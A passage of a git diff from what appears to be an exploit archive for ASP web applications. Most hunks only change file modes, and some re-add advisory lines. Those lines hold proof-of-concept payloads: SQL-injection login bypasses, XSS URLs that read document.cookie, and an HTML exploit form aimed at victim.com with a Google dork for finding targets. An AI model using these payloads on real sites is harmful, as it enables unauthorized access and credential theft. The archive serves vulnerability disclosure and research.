http://www.example.com:8080/daffodilcrm/userlogin.jsp -PoC could be: 1'or'1'='1 \ No newline at end of file +PoC could be: 1'or'1'='1 \ No newline at end of file diff --git a/platforms/asp/webapps/27160.txt b/platforms/asp/webapps/27160.txt old mode 100755 new mode 100644 index 7bb843477..ba7cf20eb --- a/platforms/asp/webapps/27160.txt +++ b/platforms/asp/webapps/27160.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://www.example.com/shop/handle/varer/sok/resultat.asp?strSok= -%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E&valg=varer \ No newline at end of file +%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E&valg=varer \ No newline at end of file diff --git a/platforms/asp/webapps/27161.txt b/platforms/asp/webapps/27161.txt old mode 100755 new mode 100644 index f7142211c..32b9544bb --- a/platforms/asp/webapps/27161.txt +++ b/platforms/asp/webapps/27161.txt @@ -13,4 +13,4 @@ http://www.example.com/default.asp?gb=kate&kat=<script>alert(document.cookie</sc http://www.example.com/default.asp?gb=kate&kat=<script>alert(document.title)</script>&ortak= -http://www.example.com/default.asp?gb=kate&kat=AnaKart&ortak="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/default.asp?gb=kate&kat=AnaKart&ortak="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/asp/webapps/27169.txt b/platforms/asp/webapps/27169.txt old mode 100755 new mode 100644 index b40b93701..2baa7bed3 --- a/platforms/asp/webapps/27169.txt +++ b/platforms/asp/webapps/27169.txt @@ -7,4 +7,4 @@ Successful exploitation could allow an attacker to compromise the application, a Code For Admin Login : Username : ' or ''=' -Password: ' or ''=' \ No newline at end of file +Password: ' or ''=' \ No newline at end of file diff --git a/platforms/asp/webapps/27174.txt b/platforms/asp/webapps/27174.txt old mode 100755 new mode 100644 index 6ed1af9e5..e49ba42f5 --- a/platforms/asp/webapps/27174.txt +++ b/platforms/asp/webapps/27174.txt @@ -5,4 +5,4 @@ GA's Forum Light is prone to an SQL-injection vulnerability. This issue is due t Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. http://www.example.com/forum/archive.asp?Forum=Test+Forum%5F1%2D13%2D2004%5F11%2D28%2D2004&pages=' -http://www.example.com/forum/archive.asp?Forum='%20or%20'='%5F1%2D13%2D2004%5F11%2D28%2D2004&pages=4 \ No newline at end of file +http://www.example.com/forum/archive.asp?Forum='%20or%20'='%5F1%2D13%2D2004%5F11%2D28%2D2004&pages=4 \ No newline at end of file diff --git a/platforms/asp/webapps/27310.txt b/platforms/asp/webapps/27310.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27469.txt b/platforms/asp/webapps/27469.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27470.txt b/platforms/asp/webapps/27470.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27471.txt b/platforms/asp/webapps/27471.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27472.txt b/platforms/asp/webapps/27472.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27473.txt b/platforms/asp/webapps/27473.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27479.txt b/platforms/asp/webapps/27479.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27480.txt b/platforms/asp/webapps/27480.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27481.txt b/platforms/asp/webapps/27481.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27482.txt b/platforms/asp/webapps/27482.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27486.txt b/platforms/asp/webapps/27486.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27487.txt b/platforms/asp/webapps/27487.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27536.txt b/platforms/asp/webapps/27536.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27552.txt b/platforms/asp/webapps/27552.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2756.txt b/platforms/asp/webapps/2756.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2762.asp b/platforms/asp/webapps/2762.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2763.txt b/platforms/asp/webapps/2763.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2764.txt b/platforms/asp/webapps/2764.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2765.txt b/platforms/asp/webapps/2765.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2772.htm b/platforms/asp/webapps/2772.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2773.txt b/platforms/asp/webapps/2773.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2774.txt b/platforms/asp/webapps/2774.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27757.txt b/platforms/asp/webapps/27757.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2779.txt b/platforms/asp/webapps/2779.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2780.txt b/platforms/asp/webapps/2780.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2781.txt b/platforms/asp/webapps/2781.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27813.txt b/platforms/asp/webapps/27813.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27814.txt b/platforms/asp/webapps/27814.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27815.txt b/platforms/asp/webapps/27815.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27816.txt b/platforms/asp/webapps/27816.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27817.txt b/platforms/asp/webapps/27817.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2782.txt b/platforms/asp/webapps/2782.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27825.txt b/platforms/asp/webapps/27825.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27826.txt b/platforms/asp/webapps/27826.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27827.txt b/platforms/asp/webapps/27827.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27828.txt b/platforms/asp/webapps/27828.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27842.txt b/platforms/asp/webapps/27842.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27844.txt b/platforms/asp/webapps/27844.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27846.txt b/platforms/asp/webapps/27846.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27849.txt b/platforms/asp/webapps/27849.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27890.txt b/platforms/asp/webapps/27890.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27896.txt b/platforms/asp/webapps/27896.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27897.txt b/platforms/asp/webapps/27897.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27898.txt b/platforms/asp/webapps/27898.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27913.txt b/platforms/asp/webapps/27913.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27918.txt b/platforms/asp/webapps/27918.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27932.txt b/platforms/asp/webapps/27932.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27945.txt b/platforms/asp/webapps/27945.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/27960.txt b/platforms/asp/webapps/27960.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28002.txt b/platforms/asp/webapps/28002.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28003.txt b/platforms/asp/webapps/28003.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28004.txt b/platforms/asp/webapps/28004.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28061.txt b/platforms/asp/webapps/28061.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28062.txt b/platforms/asp/webapps/28062.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28086.txt b/platforms/asp/webapps/28086.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2813.txt b/platforms/asp/webapps/2813.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28193.txt b/platforms/asp/webapps/28193.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28203.txt b/platforms/asp/webapps/28203.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28208.txt b/platforms/asp/webapps/28208.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2829.txt b/platforms/asp/webapps/2829.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2830.txt b/platforms/asp/webapps/2830.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28339.txt b/platforms/asp/webapps/28339.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28385.txt b/platforms/asp/webapps/28385.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28393.txt b/platforms/asp/webapps/28393.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28443.html b/platforms/asp/webapps/28443.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2846.txt b/platforms/asp/webapps/2846.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2848.txt b/platforms/asp/webapps/2848.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2849.txt b/platforms/asp/webapps/2849.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2853.txt b/platforms/asp/webapps/2853.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28566.txt b/platforms/asp/webapps/28566.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28577.txt b/platforms/asp/webapps/28577.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28587.txt b/platforms/asp/webapps/28587.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28589.txt b/platforms/asp/webapps/28589.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28593.txt b/platforms/asp/webapps/28593.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28597.txt b/platforms/asp/webapps/28597.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28600.txt b/platforms/asp/webapps/28600.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28615.txt b/platforms/asp/webapps/28615.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28742.txt b/platforms/asp/webapps/28742.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28762.txt b/platforms/asp/webapps/28762.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28768.html b/platforms/asp/webapps/28768.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2881.txt b/platforms/asp/webapps/2881.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28829.txt b/platforms/asp/webapps/28829.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28857.txt b/platforms/asp/webapps/28857.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28869.txt b/platforms/asp/webapps/28869.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28878.txt b/platforms/asp/webapps/28878.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28879.txt b/platforms/asp/webapps/28879.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28941.txt b/platforms/asp/webapps/28941.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28985.txt b/platforms/asp/webapps/28985.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28986.asp b/platforms/asp/webapps/28986.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28989.txt b/platforms/asp/webapps/28989.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28990.txt b/platforms/asp/webapps/28990.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28991.txt b/platforms/asp/webapps/28991.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28992.txt b/platforms/asp/webapps/28992.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28993.txt b/platforms/asp/webapps/28993.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/28994.txt b/platforms/asp/webapps/28994.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29008.txt b/platforms/asp/webapps/29008.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29009.txt b/platforms/asp/webapps/29009.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29010.txt b/platforms/asp/webapps/29010.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29011.txt b/platforms/asp/webapps/29011.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29012.txt b/platforms/asp/webapps/29012.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29013.txt b/platforms/asp/webapps/29013.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29014.txt b/platforms/asp/webapps/29014.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29015.txt b/platforms/asp/webapps/29015.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29016.txt b/platforms/asp/webapps/29016.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29024.txt b/platforms/asp/webapps/29024.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29025.txt b/platforms/asp/webapps/29025.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29028.txt b/platforms/asp/webapps/29028.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29029.txt b/platforms/asp/webapps/29029.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29030.txt b/platforms/asp/webapps/29030.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29031.txt b/platforms/asp/webapps/29031.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29037.txt b/platforms/asp/webapps/29037.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29038.txt b/platforms/asp/webapps/29038.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29040.txt b/platforms/asp/webapps/29040.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29041.txt b/platforms/asp/webapps/29041.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29042.txt b/platforms/asp/webapps/29042.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29043.txt b/platforms/asp/webapps/29043.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29044.txt b/platforms/asp/webapps/29044.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29046.txt b/platforms/asp/webapps/29046.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29048.txt b/platforms/asp/webapps/29048.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29053.txt b/platforms/asp/webapps/29053.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29054.txt b/platforms/asp/webapps/29054.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29063.txt b/platforms/asp/webapps/29063.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29064.txt b/platforms/asp/webapps/29064.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2907.txt b/platforms/asp/webapps/2907.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29073.txt b/platforms/asp/webapps/29073.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29074.txt b/platforms/asp/webapps/29074.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29075.txt b/platforms/asp/webapps/29075.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29077.txt b/platforms/asp/webapps/29077.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29078.txt b/platforms/asp/webapps/29078.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2908.txt b/platforms/asp/webapps/2908.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29080.txt b/platforms/asp/webapps/29080.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29081.txt b/platforms/asp/webapps/29081.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29084.txt b/platforms/asp/webapps/29084.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29085.txt b/platforms/asp/webapps/29085.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29086.txt b/platforms/asp/webapps/29086.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29087.txt b/platforms/asp/webapps/29087.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29088.txt b/platforms/asp/webapps/29088.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29089.txt b/platforms/asp/webapps/29089.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2909.txt b/platforms/asp/webapps/2909.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29090.txt b/platforms/asp/webapps/29090.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29093.txt b/platforms/asp/webapps/29093.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29094.txt b/platforms/asp/webapps/29094.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29103.txt b/platforms/asp/webapps/29103.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29104.txt b/platforms/asp/webapps/29104.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29105.txt b/platforms/asp/webapps/29105.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29106.txt b/platforms/asp/webapps/29106.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29107.txt b/platforms/asp/webapps/29107.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29108.txt b/platforms/asp/webapps/29108.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29109.txt b/platforms/asp/webapps/29109.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29110.txt b/platforms/asp/webapps/29110.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29111.txt b/platforms/asp/webapps/29111.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29112.txt b/platforms/asp/webapps/29112.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29113.txt b/platforms/asp/webapps/29113.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29114.txt b/platforms/asp/webapps/29114.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29115.txt b/platforms/asp/webapps/29115.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29116.txt b/platforms/asp/webapps/29116.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29117.txt b/platforms/asp/webapps/29117.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29118.txt b/platforms/asp/webapps/29118.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29119.txt b/platforms/asp/webapps/29119.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29120.txt b/platforms/asp/webapps/29120.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29121.txt b/platforms/asp/webapps/29121.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29122.txt b/platforms/asp/webapps/29122.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29123.txt b/platforms/asp/webapps/29123.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29124.txt b/platforms/asp/webapps/29124.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29126.txt b/platforms/asp/webapps/29126.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29133.txt b/platforms/asp/webapps/29133.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29134.txt b/platforms/asp/webapps/29134.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29135.txt b/platforms/asp/webapps/29135.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29136.txt b/platforms/asp/webapps/29136.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29137.txt b/platforms/asp/webapps/29137.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29141.txt b/platforms/asp/webapps/29141.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29142.txt b/platforms/asp/webapps/29142.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29143.txt b/platforms/asp/webapps/29143.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29151.txt b/platforms/asp/webapps/29151.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29152.txt b/platforms/asp/webapps/29152.txt old mode 100755 new mode 100644 index e1aa99cf3..17c223df0 --- a/platforms/asp/webapps/29152.txt +++ b/platforms/asp/webapps/29152.txt @@ -4,4 +4,4 @@ JiRos Links Manager is prone to multiple input-validation vulnerabilities, inclu Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation; other attacks are possible. -http://www.example.com/openlink.asp?LinkID='[sql] \ No newline at end of file +http://www.example.com/openlink.asp?LinkID='[sql] \ No newline at end of file diff --git a/platforms/asp/webapps/29153.txt b/platforms/asp/webapps/29153.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29154.txt b/platforms/asp/webapps/29154.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29155.txt b/platforms/asp/webapps/29155.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29156.txt b/platforms/asp/webapps/29156.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29174.txt b/platforms/asp/webapps/29174.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29176.txt b/platforms/asp/webapps/29176.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29178.txt b/platforms/asp/webapps/29178.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29179.txt b/platforms/asp/webapps/29179.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29180.txt b/platforms/asp/webapps/29180.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29189.txt b/platforms/asp/webapps/29189.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29191.txt b/platforms/asp/webapps/29191.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29192.txt b/platforms/asp/webapps/29192.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29193.txt b/platforms/asp/webapps/29193.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29195.txt b/platforms/asp/webapps/29195.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29196.txt b/platforms/asp/webapps/29196.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29197.txt b/platforms/asp/webapps/29197.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29216.html b/platforms/asp/webapps/29216.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29219.txt b/platforms/asp/webapps/29219.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29220.html b/platforms/asp/webapps/29220.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29224.txt b/platforms/asp/webapps/29224.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29227.txt b/platforms/asp/webapps/29227.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29228.txt b/platforms/asp/webapps/29228.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29231.txt b/platforms/asp/webapps/29231.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29240.txt b/platforms/asp/webapps/29240.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29241.txt b/platforms/asp/webapps/29241.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29271.txt b/platforms/asp/webapps/29271.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29276.txt b/platforms/asp/webapps/29276.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29288.txt b/platforms/asp/webapps/29288.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29293.txt b/platforms/asp/webapps/29293.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29333.txt b/platforms/asp/webapps/29333.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29336.txt b/platforms/asp/webapps/29336.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29357.txt b/platforms/asp/webapps/29357.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29358.txt b/platforms/asp/webapps/29358.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29359.txt b/platforms/asp/webapps/29359.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29360.txt b/platforms/asp/webapps/29360.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29361.txt b/platforms/asp/webapps/29361.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29373.txt b/platforms/asp/webapps/29373.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29385.txt b/platforms/asp/webapps/29385.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29398.txt b/platforms/asp/webapps/29398.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29401.txt b/platforms/asp/webapps/29401.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29456.txt b/platforms/asp/webapps/29456.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29457.txt b/platforms/asp/webapps/29457.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29500.txt b/platforms/asp/webapps/29500.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29533.html b/platforms/asp/webapps/29533.html old mode 100755 new mode 100644 index bed1a7192..e69135237 --- a/platforms/asp/webapps/29533.html +++ b/platforms/asp/webapps/29533.html @@ -4,4 +4,4 @@ AdMentor is prone to an SQL-injection vulnerability because the application fail A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -<html><title>AdMentor Script Remote SQL injection Exploit</title> =============================================================================================== <p><b><font size="2">[Script Name: <font color="#0000FF">AdMentor admin SQL injection </font></font></b></p> <p><b><font size="2">[Coded by : <font color="#FF0000">Cr@zy_King </font></font></b></p> <p><b><font size="2">[Author : <font color="#FF0000">Cr@zy_King </font></font></b></p> <p><b><font size="2">[Contact : <font color="#FF0000">Crazy_King@Eno7.org </font></font></b></p> <p><b><font size="2">[Dork : <font color="#0000FF">inurl:"admentor/admin" </font></font></b></p> <p><b><font size="2">[Dork Ex. : <font color="#0000FF">http://www.google.com.tr/search?hl=tr&q=inurl%3A%22admentor%2Fadmin%22&btnG=Google%27da+Ara&meta= </font></font></b></p> <p><b><font size="2">[S.Page : <font color="#0000FF">http://www.aspcode.net/products/admentor </font></font></b></p> <p><b><font size="2">[Thanks : <font color="#008000">Erne & ApAci & Eno7 & Uyuss & Liz0zim & Thehacker & Xoron & Ajann</font></font></b> =============================================================================================== </p> <FORM NAME=giris ACTION="http://victim.com/[path to script]/admin/login.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or' '='" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or' '='" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> <b><font face="Verdana" size="2" color="#008000">Exploit Coded By Cr@zy_King</font></b></p> </tr></table></form></html> \ No newline at end of file +<html><title>AdMentor Script Remote SQL injection Exploit</title> =============================================================================================== <p><b><font size="2">[Script Name: <font color="#0000FF">AdMentor admin SQL injection </font></font></b></p> <p><b><font size="2">[Coded by : <font color="#FF0000">Cr@zy_King </font></font></b></p> <p><b><font size="2">[Author : <font color="#FF0000">Cr@zy_King </font></font></b></p> <p><b><font size="2">[Contact : <font color="#FF0000">Crazy_King@Eno7.org </font></font></b></p> <p><b><font size="2">[Dork : <font color="#0000FF">inurl:"admentor/admin" </font></font></b></p> <p><b><font size="2">[Dork Ex. : <font color="#0000FF">http://www.google.com.tr/search?hl=tr&q=inurl%3A%22admentor%2Fadmin%22&btnG=Google%27da+Ara&meta= </font></font></b></p> <p><b><font size="2">[S.Page : <font color="#0000FF">http://www.aspcode.net/products/admentor </font></font></b></p> <p><b><font size="2">[Thanks : <font color="#008000">Erne & ApAci & Eno7 & Uyuss & Liz0zim & Thehacker & Xoron & Ajann</font></font></b> =============================================================================================== </p> <FORM NAME=giris ACTION="http://victim.com/[path to script]/admin/login.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or' '='" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or' '='" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> <b><font face="Verdana" size="2" color="#008000">Exploit Coded 